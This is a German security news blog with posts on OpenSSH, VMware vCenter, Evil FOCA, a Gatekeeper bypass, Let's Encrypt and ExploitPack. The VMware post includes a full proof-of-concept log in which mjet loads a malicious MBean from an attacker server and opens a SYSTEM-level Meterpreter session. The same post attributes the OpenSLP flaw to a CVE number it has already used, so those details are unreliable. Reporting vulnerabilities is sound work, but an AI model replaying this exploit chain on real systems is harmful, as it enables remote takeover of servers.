15 Jan

777 – OpenSSH-Vulnerability leaked geheime Schlüssel

777-triple-seven-opensshTriple Seven – (CVE-2016-0777 und -0778) – OpenSSH Vulnerability

Eine seit 2010 standardmäßig aktivierte und unfertige OpenSSH Option führt dazu das Server die geheimen Schlüssel der sich verbindenden Benutzern auslesen kann.
Updates, zum schließen der Lücke, wurden bereits veröffentlicht.

Aufgrund der CVE Nummer CVE-2016-0777 und -0778 hat diese Schwachstellen den Spitznamen „Triple-Seven“ bekommen.
Betroffen sind alle Open SSH-Versionen von 5.4 – 7.1. Update 7.1p2 schließt die Lücke.

Hier der Security Advisor mit Proof of Concept  von Qualys

03 Okt

Kritische Lücke in VMware vCenter Server und ESXi

LOGO1

Advisory ID: VMSA-2015-0007
CVE Numbers: CVE-2015-5177 CVE-2015-2342 CVE-2015-1047

CVE-2015-5177 – kritisch
Fehler im JMX-RMI-Service im vCenter Server. – Remote Code Execution
Hier ist bereits ein Metasploit Modul verfügbar.

Proof of Concept:
root@Whack:/opt/mjet# nmap -sS 1.1.1.2 -p 9875 –script=/usr/share/nmap/scripts/rmi-dumpregistry.nse
Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-15 16:56 BST
Nmap scan report for 1.1.1.2
Host is up (0.00036s latency).
PORT STATE SERVICE
9875/tcp open java-rmi
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @1.1.1.2:50966
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
MAC Address: 00:0C:29:D1:00:30 (VMware)
root@Whack:/opt/mjet# java -jar mjet.jar -t 1.1.1.2 -p 9875 -u http://1.1.1.1:8080/TArDcls4aeQZVWl
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
--------------------------------------------------- 
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://1.1.1.2:9875/jmxrmi ...
[+] Connected: rmi://1.1.1.2 16
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://1.1.1.1:8080/TArDcls4aeQZVWl
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: drmwfzvo:name=NApCjRCB,id=gsKsVVHK
[+] Invoking: metasploit.Metasploit.run()
[+] Done
Metasploit Shell
-------------------------
2015-02-24 10:11:44 +0000 S:0 J:3 msf exploit(java_mlet_server) >
[*] Using URL: http://1.1.1.1:8080/TArDcls4aeQZVWl
[*] Server started.
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl/
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] Sending stage (30355 bytes) to 1.1.1.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.2:50456) at 2015-02-24 10:12:32 +0000
 
2015-02-24 10:14:10 +0000 S:1 J:3 msf exploit(java_mlet_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: SYSTEM

CVE-2015-5177:
Fehler in der OpenSLP-Funktion – Remote Code Execution
Betroffene Versionen 5.0, 5.1 und 5.5

CVE-2015-1047:
Der vpxd Service bei den Versionen 5.0,5.1 und 5.5 ist für DoS-Attacken anfällig.

Entsprechende Updates sind bei VMware bereits verfügbar.

02 Okt

Evil FOCA – Network Attack Tool

Evil FOCA ist ein Windows Tool zum überprüfen der Sicherheit von IPV4 und IPV6 Netzen für Pentester und Auditoren.

Folgende Attacken sind möglich:

  • MITM über IPV4 mit ARP spoofing und DHCP ACK Injections.
  • MITM über IPV6 mit Neighbor Advertisment Spooing, SLAAC attacks und fake DHCPv6
  • DoS auf IPV4 mit ARP Spoofing
  • DoS auf IPV6 mit SLAAC DoS
  • DNS Hijacking

Evil FOCA scannt automatisch das gesammte Netz, alle Geräte und deren Netzwerkinterfaces, und fügt alle IPV6, IPV4 und Physische Adressen in ein intuitives Interface ein.

Evil Foca is released under the GNU Public License 3.0
Link

01 Okt

Bypass Apple’s Gatekeeper – Malware auf den Mac schmuggeln

Der leitende Sicherheitsforscher Wardle hat den Sicherheitsmechanismus „Gatekeeper“ von Apples Betriebssystem OS X umgangen und unsignierten Code ausgeführt.

Der Gatekeeper überprüft Programme vor der Installation und prüft, ob diese aus einer vertrauenswürdigen Quelle stammen. Wenn das der Fall ist, sind diese entsprechend signiert und das Programm kann installiert werden. Wardle zeigte jedoch auf, dass man diese Überprüfung vergleichsweise einfach umgehen kann.

Als Einfallstor setzte Wardle auf eine von Apple als vertrauenswürdig eingestufte Binär-Datei. In seinem Test packte er diese in ein Apple Disk Image, welche er mit einer weiteren, nicht-signierten Anwendung auffüllte.

Beim Installieren hat Gatekeeper die signierte Binär-Datei als vertrauenswürdig eingestuft und im gleichen Zuge auch die nicht-signierte Anwendung durchgewinkt und ausgeführt. Das passiert, weil Gatekeeper nur die erste Anwendung prüft und das folgende nicht mehr.

(teilw. ct anw)

06 Jun

Let´s Encrypt: Freies SSL für Alle

Let´s Encrypt ist eine freie, automatisierte und offene certificate authority (CA) und frei verfügbar für alle.
Gestartet und betrieben wird das ganze Mitte 2015 von der Internet Research Group (ISRG).

Wie funktioniert das ganze?
Es könnte nicht einfacher sein:
Um unter Linux für seinen Webserver SSL zu aktivieren reicht wohl folgendes aus:

$ sudo apt-get install lets-encrypt

$ lets-encrypt example.com

mehr unter letsencrypt.org

05 Jun

Exploit Pack: Pentesting-Tool


ExploitPack kommt mit einer übersichtlichen Benutzeroberfläche und bietet derzeit ca. 300 Exploits
Mit ExploitPack ist es möglich Systeme auf Sicherheitslücken zu untersuchen und in diese einzudringen.
Es stehen ca. 300 Exploits für Windows, Linux und Mac OS X zur Verfügung.
Und natürlich ist es möglich eigene Angriffs Module dafür zu entwerfen.

Noch kein Ersatz für Metasploit, jedoch sehr vielversprechend.
Platform: Linux, Windows, OS X – min. Java8 – GPLv3
Url: exploitpack.com